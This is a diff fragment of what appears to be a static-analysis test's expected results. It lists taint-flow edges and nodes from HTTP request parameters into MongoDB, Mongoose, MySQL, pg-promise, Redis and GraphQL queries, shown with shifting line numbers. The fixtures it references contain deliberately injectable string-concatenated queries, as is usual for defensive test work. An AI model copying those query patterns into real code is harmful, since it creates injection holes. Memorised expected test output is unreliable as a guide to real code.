mongoose.js:43:22:43:26 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:45:18:45:22 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | 
mongoose.js:47:22:47:26 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:49:21:49:25 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:51:32:51:36 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:53:27:53:31 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:54:8:54:12 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:57:17:57:21 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:58:10:58:14 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:59:8:59:12 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:60:7:60:11 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:61:16:61:20 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:62:12:62:16 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:63:10:63:14 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:67:37:67:41 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:68:46:68:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:69:47:69:51 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:71:46:71:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:73:51:73:55 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:75:46:75:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:78:46:78:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:80:51:80:55 | query | provenance | Config | +| 
mongoose.js:21:16:21:29 | req.body.title | mongoose.js:82:46:82:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:90:21:90:25 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:97:14:97:18 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:99:31:99:35 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:119:38:119:42 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:122:30:122:34 | query | provenance | Config | +| mongoose.js:23:22:23:26 | query | mongoose.js:23:21:23:27 | [query] | provenance | Config | +| mongoose.js:23:22:23:26 | query | mongoose.js:25:17:25:21 | query | provenance | | +| mongoose.js:25:17:25:21 | query | mongoose.js:27:22:27:26 | query | provenance | | +| mongoose.js:27:22:27:26 | query | mongoose.js:29:21:29:25 | query | provenance | | +| mongoose.js:29:21:29:25 | query | mongoose.js:31:28:31:32 | query | provenance | | +| mongoose.js:31:28:31:32 | query | mongoose.js:33:16:33:20 | query | provenance | | +| mongoose.js:33:16:33:20 | query | mongoose.js:35:19:35:23 | query | provenance | | +| mongoose.js:35:19:35:23 | query | mongoose.js:37:28:37:32 | query | provenance | | +| mongoose.js:37:28:37:32 | query | mongoose.js:39:28:39:32 | query | provenance | | +| mongoose.js:39:28:39:32 | query | mongoose.js:41:28:41:32 | query | provenance | | +| mongoose.js:41:28:41:32 | query | mongoose.js:43:22:43:26 | query | provenance | | +| mongoose.js:43:22:43:26 | query | mongoose.js:45:18:45:22 | query | provenance | | +| mongoose.js:45:18:45:22 | query | mongoose.js:47:22:47:26 | query | provenance | | +| mongoose.js:47:22:47:26 | query | mongoose.js:49:21:49:25 | query | provenance | | +| mongoose.js:49:21:49:25 | query | mongoose.js:51:32:51:36 | query | provenance | | +| mongoose.js:51:32:51:36 | query | mongoose.js:53:27:53:31 | query | provenance | | 
+| mongoose.js:53:27:53:31 | query | mongoose.js:54:8:54:12 | query | provenance | | +| mongoose.js:54:8:54:12 | query | mongoose.js:57:17:57:21 | query | provenance | | +| mongoose.js:57:17:57:21 | query | mongoose.js:58:10:58:14 | query | provenance | | +| mongoose.js:58:10:58:14 | query | mongoose.js:59:8:59:12 | query | provenance | | +| mongoose.js:59:8:59:12 | query | mongoose.js:60:7:60:11 | query | provenance | | +| mongoose.js:60:7:60:11 | query | mongoose.js:61:16:61:20 | query | provenance | | +| mongoose.js:61:16:61:20 | query | mongoose.js:62:12:62:16 | query | provenance | | +| mongoose.js:62:12:62:16 | query | mongoose.js:63:10:63:14 | query | provenance | | +| mongoose.js:63:10:63:14 | query | mongoose.js:67:37:67:41 | query | provenance | | +| mongoose.js:67:37:67:41 | query | mongoose.js:68:46:68:50 | query | provenance | | +| mongoose.js:68:46:68:50 | query | mongoose.js:69:47:69:51 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:71:46:71:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:73:51:73:55 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:75:46:75:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:78:46:78:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:80:51:80:55 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:82:46:82:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:90:21:90:25 | query | provenance | | +| mongoose.js:90:21:90:25 | query | mongoose.js:97:14:97:18 | query | provenance | | +| mongoose.js:97:14:97:18 | query | mongoose.js:99:31:99:35 | query | provenance | | +| mongoose.js:99:31:99:35 | query | mongoose.js:119:38:119:42 | query | provenance | | +| mongoose.js:101:6:101:22 | id | mongoose.js:109:20:109:21 | id | provenance | | +| mongoose.js:101:6:101:22 | id | mongoose.js:116:23:116:24 | id | provenance | | +| mongoose.js:101:11:101:22 | 
req.query.id | mongoose.js:101:6:101:22 | id | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:102:22:102:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:103:21:103:24 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:104:21:104:24 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:105:18:105:21 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:106:22:106:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:107:16:107:19 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:108:19:108:22 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:110:28:110:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:111:28:111:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:112:28:112:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:113:18:113:21 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:114:22:114:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:115:21:115:24 | cond | provenance | | +| mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:101:25:101:45 | cond | provenance | | +| mongoose.js:116:23:116:24 | id | mongoose.js:116:16:116:26 | { _id: id } | provenance | Config | +| mongoose.js:119:38:119:42 | query | mongoose.js:122:30:122:34 | query | provenance | | +| mongooseJsonParse.js:19:11:19:20 | query | mongooseJsonParse.js:22:19:22:23 | query | provenance | | +| mongooseJsonParse.js:19:19:19:20 | {} | mongooseJsonParse.js:19:11:19:20 | query | provenance | | +| mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | provenance | Config | +| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... 
).title | mongooseJsonParse.js:19:11:19:20 | query | provenance | Config | +| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:19:19:19:20 | {} | provenance | Config | +| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:22:19:22:23 | query | provenance | Config | +| mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | provenance | Config | +| mongooseModelClient.js:10:7:10:32 | v | mongooseModelClient.js:11:22:11:22 | v | provenance | | +| mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | mongooseModelClient.js:10:7:10:32 | v | provenance | | +| mongooseModelClient.js:10:22:10:29 | req.body | mongooseModelClient.js:10:22:10:31 | req.body.x | provenance | Config | +| mongooseModelClient.js:10:22:10:31 | req.body.x | mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | provenance | Config | +| mongooseModelClient.js:11:22:11:22 | v | mongooseModelClient.js:11:16:11:24 | { id: v } | provenance | Config | +| mongooseModelClient.js:12:22:12:29 | req.body | mongooseModelClient.js:12:22:12:32 | req.body.id | provenance | Config | +| mongooseModelClient.js:12:22:12:32 | req.body.id | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | provenance | Config | +| mysql.js:6:9:6:31 | temp | mysql.js:15:62:15:65 | temp | provenance | | +| mysql.js:6:9:6:31 | temp | mysql.js:19:70:19:73 | temp | provenance | | +| mysql.js:6:16:6:31 | req.params.value | mysql.js:6:9:6:31 | temp | provenance | | +| mysql.js:15:62:15:65 | temp | mysql.js:15:18:15:65 | 'SELECT ... + temp | provenance | | +| mysql.js:19:70:19:73 | temp | mysql.js:19:26:19:73 | 'SELECT ... 
+ temp | provenance | | +| pg-promise-types.ts:7:9:7:28 | taint | pg-promise-types.ts:8:17:8:21 | taint | provenance | | +| pg-promise-types.ts:7:17:7:28 | req.params.x | pg-promise-types.ts:7:9:7:28 | taint | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:9:10:9:14 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:10:11:10:15 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:11:17:11:21 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:12:10:12:14 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:13:12:13:16 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:14:18:14:22 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:15:11:15:15 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:16:10:16:14 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:17:16:17:20 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:18:12:18:16 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:19:13:19:17 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:22:11:22:15 | query | provenance | | +| pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:6:7:7:55 | query | provenance | | +| pg-promise.js:9:10:9:14 | query | pg-promise.js:10:11:10:15 | query | provenance | | +| pg-promise.js:10:11:10:15 | query | pg-promise.js:11:17:11:21 | query | provenance | | +| pg-promise.js:11:17:11:21 | query | pg-promise.js:12:10:12:14 | query | provenance | | +| pg-promise.js:12:10:12:14 | query | pg-promise.js:13:12:13:16 | query | provenance | | +| pg-promise.js:13:12:13:16 | query | pg-promise.js:14:18:14:22 | query | provenance | | +| pg-promise.js:14:18:14:22 | query | pg-promise.js:15:11:15:15 | query | provenance | | +| pg-promise.js:15:11:15:15 | query | pg-promise.js:16:10:16:14 | query | provenance | | +| 
pg-promise.js:16:10:16:14 | query | pg-promise.js:17:16:17:20 | query | provenance | | +| pg-promise.js:17:16:17:20 | query | pg-promise.js:18:12:18:16 | query | provenance | | +| pg-promise.js:18:12:18:16 | query | pg-promise.js:19:13:19:17 | query | provenance | | +| pg-promise.js:19:13:19:17 | query | pg-promise.js:22:11:22:15 | query | provenance | | +| pg-promise.js:22:11:22:15 | query | pg-promise.js:60:20:60:24 | query | provenance | | +| pg-promise.js:22:11:22:15 | query | pg-promise.js:63:23:63:27 | query | provenance | | +| pg-promise.js:22:11:22:15 | query | pg-promise.js:64:16:64:20 | query | provenance | | +| redis.js:10:16:10:23 | req.body | redis.js:10:16:10:27 | req.body.key | provenance | Config | +| redis.js:12:9:12:26 | key | redis.js:13:16:13:18 | key | provenance | | +| redis.js:12:9:12:26 | key | redis.js:18:16:18:18 | key | provenance | | +| redis.js:12:9:12:26 | key | redis.js:19:43:19:45 | key | provenance | | +| redis.js:12:9:12:26 | key | redis.js:25:14:25:16 | key | provenance | | +| redis.js:12:9:12:26 | key | redis.js:26:14:26:16 | key | provenance | | +| redis.js:12:9:12:26 | key | redis.js:32:28:32:30 | key | provenance | | +| redis.js:12:15:12:22 | req.body | redis.js:12:15:12:26 | req.body.key | provenance | Config | +| redis.js:12:15:12:26 | req.body.key | redis.js:12:9:12:26 | key | provenance | | +| redis.js:13:16:13:18 | key | redis.js:18:16:18:18 | key | provenance | | +| redis.js:18:16:18:18 | key | redis.js:19:43:19:45 | key | provenance | | +| redis.js:19:43:19:45 | key | redis.js:25:14:25:16 | key | provenance | | +| redis.js:25:14:25:16 | key | redis.js:26:14:26:16 | key | provenance | | +| redis.js:26:14:26:16 | key | redis.js:30:23:30:25 | key | provenance | | +| redis.js:26:14:26:16 | key | redis.js:32:28:32:30 | key | provenance | | +| redis.js:38:11:38:28 | key | redis.js:39:16:39:18 | key | provenance | | +| redis.js:38:11:38:28 | key | redis.js:43:27:43:29 | key | provenance | | +| redis.js:38:11:38:28 | key | 
redis.js:46:34:46:36 | key | provenance | | +| redis.js:38:17:38:24 | req.body | redis.js:38:17:38:28 | req.body.key | provenance | Config | +| redis.js:38:17:38:28 | req.body.key | redis.js:38:11:38:28 | key | provenance | | +| socketio.js:10:25:10:30 | handle | socketio.js:11:46:11:51 | handle | provenance | | +| socketio.js:11:46:11:51 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | provenance | | +| tst2.js:8:66:8:78 | req.params.id | tst2.js:8:27:8:84 | "select ... d + "'" | provenance | | +| tst3.js:7:7:8:55 | query1 | tst3.js:9:14:9:19 | query1 | provenance | | +| tst3.js:8:16:8:34 | req.params.category | tst3.js:7:7:8:55 | query1 | provenance | | +| tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | provenance | | +| tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | provenance | | nodes | graphql.js:8:11:8:28 | id | semmle.label | id | | graphql.js:8:16:8:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:10:34:20:5 | `\\n ... }\\n ` | semmle.label | `\\n ... 
}\\n ` | -| graphql.js:12:46:12:47 | id | semmle.label | id | -| graphql.js:26:11:26:28 | id | semmle.label | id | -| graphql.js:26:16:26:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:27:30:27:40 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:27:37:27:38 | id | semmle.label | id | -| graphql.js:30:32:30:42 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:30:39:30:40 | id | semmle.label | id | -| graphql.js:33:18:33:28 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:33:25:33:26 | id | semmle.label | id | -| graphql.js:39:11:39:28 | id | semmle.label | id | -| graphql.js:39:16:39:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:44:14:44:24 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:44:21:44:22 | id | semmle.label | id | -| graphql.js:48:44:48:54 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:48:51:48:52 | id | semmle.label | id | -| graphql.js:55:11:55:28 | id | semmle.label | id | -| graphql.js:55:16:55:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:56:39:56:49 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:56:46:56:47 | id | semmle.label | id | -| graphql.js:58:66:58:76 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:58:73:58:74 | id | semmle.label | id | -| graphql.js:74:9:74:25 | id | semmle.label | id | -| graphql.js:74:14:74:25 | req.query.id | semmle.label | req.query.id | -| graphql.js:75:46:75:64 | "{ foo" + id + " }" | semmle.label | "{ foo" + id + " }" | -| graphql.js:75:56:75:57 | id | semmle.label | id | -| graphql.js:84:14:90:8 | `{\\n ... }` | semmle.label | `{\\n ... }` | -| graphql.js:88:13:88:14 | id | semmle.label | id | -| graphql.js:119:11:119:28 | id | semmle.label | id | -| graphql.js:119:16:119:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:120:38:120:48 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:120:45:120:46 | id | semmle.label | id | +| graphql.js:9:34:19:5 | `\\n ... 
}\\n ` | semmle.label | `\\n ... }\\n ` | +| graphql.js:11:46:11:47 | id | semmle.label | id | +| graphql.js:25:11:25:28 | id | semmle.label | id | +| graphql.js:25:16:25:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:26:30:26:40 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:26:37:26:38 | id | semmle.label | id | +| graphql.js:29:32:29:42 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:29:39:29:40 | id | semmle.label | id | +| graphql.js:32:18:32:28 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:32:25:32:26 | id | semmle.label | id | +| graphql.js:38:11:38:28 | id | semmle.label | id | +| graphql.js:38:16:38:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:43:14:43:24 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:43:21:43:22 | id | semmle.label | id | +| graphql.js:47:44:47:54 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:47:51:47:52 | id | semmle.label | id | +| graphql.js:54:11:54:28 | id | semmle.label | id | +| graphql.js:54:16:54:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:55:39:55:49 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:55:46:55:47 | id | semmle.label | id | +| graphql.js:57:66:57:76 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:57:73:57:74 | id | semmle.label | id | +| graphql.js:73:9:73:25 | id | semmle.label | id | +| graphql.js:73:14:73:25 | req.query.id | semmle.label | req.query.id | +| graphql.js:74:46:74:64 | "{ foo" + id + " }" | semmle.label | "{ foo" + id + " }" | +| graphql.js:74:56:74:57 | id | semmle.label | id | +| graphql.js:82:14:88:8 | `{\\n ... }` | semmle.label | `{\\n ... 
}` | +| graphql.js:86:13:86:14 | id | semmle.label | id | +| graphql.js:117:11:117:28 | id | semmle.label | id | +| graphql.js:117:16:117:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:118:38:118:48 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:118:45:118:46 | id | semmle.label | id | | html-sanitizer.js:13:39:13:44 | param1 | semmle.label | param1 | | html-sanitizer.js:14:5:14:24 | param1 | semmle.label | param1 | | html-sanitizer.js:14:14:14:24 | xss(param1) | semmle.label | xss(param1) | 
@@ -84,125 +555,125 @@ nodes | marsdb-flow-to.js:10:17:10:18 | {} | semmle.label | {} | | marsdb-flow-to.js:11:17:11:24 | req.body | semmle.label | req.body | | marsdb-flow-to.js:11:17:11:30 | req.body.title | semmle.label | req.body.title | -| marsdb-flow-to.js:14:17:14:21 | query | semmle.label | query | +| marsdb-flow-to.js:13:17:13:21 | query | semmle.label | query | | marsdb.js:12:9:12:18 | query | semmle.label | query | | marsdb.js:12:17:12:18 | {} | semmle.label | {} | | marsdb.js:13:17:13:24 | req.body | semmle.label | req.body | | marsdb.js:13:17:13:30 | req.body.title | semmle.label | req.body.title | -| marsdb.js:16:12:16:16 | query | semmle.label | query | +| marsdb.js:15:12:15:16 | query | semmle.label | query | | minimongo.js:14:9:14:18 | query | semmle.label | query | | minimongo.js:14:17:14:18 | {} | semmle.label | {} | | minimongo.js:15:17:15:24 | req.body | semmle.label | req.body | | minimongo.js:15:17:15:30 | req.body.title | semmle.label | req.body.title | -| minimongo.js:18:12:18:16 | query | semmle.label | query | +| minimongo.js:17:12:17:16 | query | semmle.label | query | | mongodb.js:12:11:12:20 | query | semmle.label | query | | mongodb.js:12:19:12:20 | {} | semmle.label | {} | | mongodb.js:13:5:13:9 | query | semmle.label | query | | mongodb.js:13:19:13:26 | req.body | semmle.label | req.body | | mongodb.js:13:19:13:32 | req.body.title | semmle.label | req.body.title | -| mongodb.js:18:16:18:20 | query | semmle.label | query | -| mongodb.js:26:11:26:32 | title | semmle.label | title | -| mongodb.js:26:19:26:26 | req.body | semmle.label | req.body | -| mongodb.js:26:19:26:32 | req.body.title | semmle.label | req.body.title | -| mongodb.js:32:18:32:45 | { title ... itle) } | semmle.label | { title ... 
itle) } | -| mongodb.js:32:27:32:43 | JSON.parse(title) | semmle.label | JSON.parse(title) | -| mongodb.js:32:38:32:42 | title | semmle.label | title | -| mongodb.js:48:11:48:20 | query | semmle.label | query | -| mongodb.js:48:19:48:20 | {} | semmle.label | {} | -| mongodb.js:49:5:49:9 | query | semmle.label | query | -| mongodb.js:49:19:49:33 | req.query.title | semmle.label | req.query.title | -| mongodb.js:54:16:54:20 | query | semmle.label | query | -| mongodb.js:59:8:59:17 | query | semmle.label | query | -| mongodb.js:59:16:59:17 | {} | semmle.label | {} | -| mongodb.js:60:2:60:6 | query | semmle.label | query | -| mongodb.js:60:16:60:30 | req.query.title | semmle.label | req.query.title | -| mongodb.js:65:12:65:16 | query | semmle.label | query | -| mongodb.js:70:7:70:25 | tag | semmle.label | tag | -| mongodb.js:70:13:70:25 | req.query.tag | semmle.label | req.query.tag | -| mongodb.js:77:14:77:26 | { tags: tag } | semmle.label | { tags: tag } | -| mongodb.js:77:22:77:24 | tag | semmle.label | tag | -| mongodb.js:85:12:85:24 | { tags: tag } | semmle.label | { tags: tag } | -| mongodb.js:85:20:85:22 | tag | semmle.label | tag | -| mongodb.js:106:9:106:18 | query | semmle.label | query | -| mongodb.js:106:17:106:18 | {} | semmle.label | {} | -| mongodb.js:107:3:107:7 | query | semmle.label | query | -| mongodb.js:107:17:107:29 | queries.title | semmle.label | queries.title | -| mongodb.js:112:14:112:18 | query | semmle.label | query | +| mongodb.js:17:16:17:20 | query | semmle.label | query | +| mongodb.js:25:11:25:32 | title | semmle.label | title | +| mongodb.js:25:19:25:26 | req.body | semmle.label | req.body | +| mongodb.js:25:19:25:32 | req.body.title | semmle.label | req.body.title | +| mongodb.js:30:18:30:45 | { title ... itle) } | semmle.label | { title ... 
itle) } | +| mongodb.js:30:27:30:43 | JSON.parse(title) | semmle.label | JSON.parse(title) | +| mongodb.js:30:38:30:42 | title | semmle.label | title | +| mongodb.js:46:11:46:20 | query | semmle.label | query | +| mongodb.js:46:19:46:20 | {} | semmle.label | {} | +| mongodb.js:47:5:47:9 | query | semmle.label | query | +| mongodb.js:47:19:47:33 | req.query.title | semmle.label | req.query.title | +| mongodb.js:51:16:51:20 | query | semmle.label | query | +| mongodb.js:56:8:56:17 | query | semmle.label | query | +| mongodb.js:56:16:56:17 | {} | semmle.label | {} | +| mongodb.js:57:2:57:6 | query | semmle.label | query | +| mongodb.js:57:16:57:30 | req.query.title | semmle.label | req.query.title | +| mongodb.js:61:12:61:16 | query | semmle.label | query | +| mongodb.js:66:7:66:25 | tag | semmle.label | tag | +| mongodb.js:66:13:66:25 | req.query.tag | semmle.label | req.query.tag | +| mongodb.js:72:14:72:26 | { tags: tag } | semmle.label | { tags: tag } | +| mongodb.js:72:22:72:24 | tag | semmle.label | tag | +| mongodb.js:79:12:79:24 | { tags: tag } | semmle.label | { tags: tag } | +| mongodb.js:79:20:79:22 | tag | semmle.label | tag | +| mongodb.js:100:9:100:18 | query | semmle.label | query | +| mongodb.js:100:17:100:18 | {} | semmle.label | {} | +| mongodb.js:101:3:101:7 | query | semmle.label | query | +| mongodb.js:101:17:101:29 | queries.title | semmle.label | queries.title | +| mongodb.js:105:14:105:18 | query | semmle.label | query | | mongodb_bodySafe.js:23:11:23:20 | query | semmle.label | query | | mongodb_bodySafe.js:23:19:23:20 | {} | semmle.label | {} | | mongodb_bodySafe.js:24:5:24:9 | query | semmle.label | query | | mongodb_bodySafe.js:24:19:24:33 | req.query.title | semmle.label | req.query.title | -| mongodb_bodySafe.js:29:16:29:20 | query | semmle.label | query | +| mongodb_bodySafe.js:28:16:28:20 | query | semmle.label | query | | mongoose.js:20:8:20:17 | query | semmle.label | query | | mongoose.js:20:16:20:17 | {} | semmle.label | {} | | 
mongoose.js:21:2:21:6 | query | semmle.label | query | | mongoose.js:21:16:21:23 | req.body | semmle.label | req.body | | mongoose.js:21:16:21:29 | req.body.title | semmle.label | req.body.title | -| mongoose.js:24:21:24:27 | [query] | semmle.label | [query] | -| mongoose.js:24:22:24:26 | query | semmle.label | query | -| mongoose.js:27:17:27:21 | query | semmle.label | query | -| mongoose.js:30:22:30:26 | query | semmle.label | query | -| mongoose.js:33:21:33:25 | query | semmle.label | query | -| mongoose.js:36:28:36:32 | query | semmle.label | query | -| mongoose.js:39:16:39:20 | query | semmle.label | query | -| mongoose.js:42:19:42:23 | query | semmle.label | query | -| mongoose.js:45:28:45:32 | query | semmle.label | query | -| mongoose.js:48:28:48:32 | query | semmle.label | query | -| mongoose.js:51:28:51:32 | query | semmle.label | query | -| mongoose.js:54:22:54:26 | query | semmle.label | query | -| mongoose.js:57:18:57:22 | query | semmle.label | query | -| mongoose.js:60:22:60:26 | query | semmle.label | query | -| mongoose.js:63:21:63:25 | query | semmle.label | query | -| mongoose.js:65:32:65:36 | query | semmle.label | query | -| mongoose.js:67:27:67:31 | query | semmle.label | query | -| mongoose.js:68:8:68:12 | query | semmle.label | query | -| mongoose.js:71:17:71:21 | query | semmle.label | query | -| mongoose.js:72:10:72:14 | query | semmle.label | query | -| mongoose.js:73:8:73:12 | query | semmle.label | query | -| mongoose.js:74:7:74:11 | query | semmle.label | query | -| mongoose.js:75:16:75:20 | query | semmle.label | query | -| mongoose.js:76:12:76:16 | query | semmle.label | query | -| mongoose.js:77:10:77:14 | query | semmle.label | query | -| mongoose.js:81:37:81:41 | query | semmle.label | query | +| mongoose.js:23:21:23:27 | [query] | semmle.label | [query] | +| mongoose.js:23:22:23:26 | query | semmle.label | query | +| mongoose.js:25:17:25:21 | query | semmle.label | query | +| mongoose.js:27:22:27:26 | query | semmle.label | query 
| +| mongoose.js:29:21:29:25 | query | semmle.label | query | +| mongoose.js:31:28:31:32 | query | semmle.label | query | +| mongoose.js:33:16:33:20 | query | semmle.label | query | +| mongoose.js:35:19:35:23 | query | semmle.label | query | +| mongoose.js:37:28:37:32 | query | semmle.label | query | +| mongoose.js:39:28:39:32 | query | semmle.label | query | +| mongoose.js:41:28:41:32 | query | semmle.label | query | +| mongoose.js:43:22:43:26 | query | semmle.label | query | +| mongoose.js:45:18:45:22 | query | semmle.label | query | +| mongoose.js:47:22:47:26 | query | semmle.label | query | +| mongoose.js:49:21:49:25 | query | semmle.label | query | +| mongoose.js:51:32:51:36 | query | semmle.label | query | +| mongoose.js:53:27:53:31 | query | semmle.label | query | +| mongoose.js:54:8:54:12 | query | semmle.label | query | +| mongoose.js:57:17:57:21 | query | semmle.label | query | +| mongoose.js:58:10:58:14 | query | semmle.label | query | +| mongoose.js:59:8:59:12 | query | semmle.label | query | +| mongoose.js:60:7:60:11 | query | semmle.label | query | +| mongoose.js:61:16:61:20 | query | semmle.label | query | +| mongoose.js:62:12:62:16 | query | semmle.label | query | +| mongoose.js:63:10:63:14 | query | semmle.label | query | +| mongoose.js:67:37:67:41 | query | semmle.label | query | +| mongoose.js:68:46:68:50 | query | semmle.label | query | +| mongoose.js:69:47:69:51 | query | semmle.label | query | +| mongoose.js:71:46:71:50 | query | semmle.label | query | +| mongoose.js:73:51:73:55 | query | semmle.label | query | +| mongoose.js:75:46:75:50 | query | semmle.label | query | +| mongoose.js:78:46:78:50 | query | semmle.label | query | +| mongoose.js:80:51:80:55 | query | semmle.label | query | | mongoose.js:82:46:82:50 | query | semmle.label | query | -| mongoose.js:83:47:83:51 | query | semmle.label | query | -| mongoose.js:85:46:85:50 | query | semmle.label | query | -| mongoose.js:87:51:87:55 | query | semmle.label | query | -| 
mongoose.js:89:46:89:50 | query | semmle.label | query | -| mongoose.js:92:46:92:50 | query | semmle.label | query | -| mongoose.js:94:51:94:55 | query | semmle.label | query | -| mongoose.js:96:46:96:50 | query | semmle.label | query | -| mongoose.js:104:21:104:25 | query | semmle.label | query | -| mongoose.js:111:14:111:18 | query | semmle.label | query | -| mongoose.js:113:31:113:35 | query | semmle.label | query | -| mongoose.js:115:6:115:22 | id | semmle.label | id | -| mongoose.js:115:11:115:22 | req.query.id | semmle.label | req.query.id | -| mongoose.js:115:25:115:45 | cond | semmle.label | cond | -| mongoose.js:115:32:115:45 | req.query.cond | semmle.label | req.query.cond | -| mongoose.js:116:22:116:25 | cond | semmle.label | cond | -| mongoose.js:117:21:117:24 | cond | semmle.label | cond | -| mongoose.js:118:21:118:24 | cond | semmle.label | cond | -| mongoose.js:119:18:119:21 | cond | semmle.label | cond | -| mongoose.js:120:22:120:25 | cond | semmle.label | cond | -| mongoose.js:121:16:121:19 | cond | semmle.label | cond | -| mongoose.js:122:19:122:22 | cond | semmle.label | cond | -| mongoose.js:123:20:123:21 | id | semmle.label | id | -| mongoose.js:124:28:124:31 | cond | semmle.label | cond | -| mongoose.js:125:28:125:31 | cond | 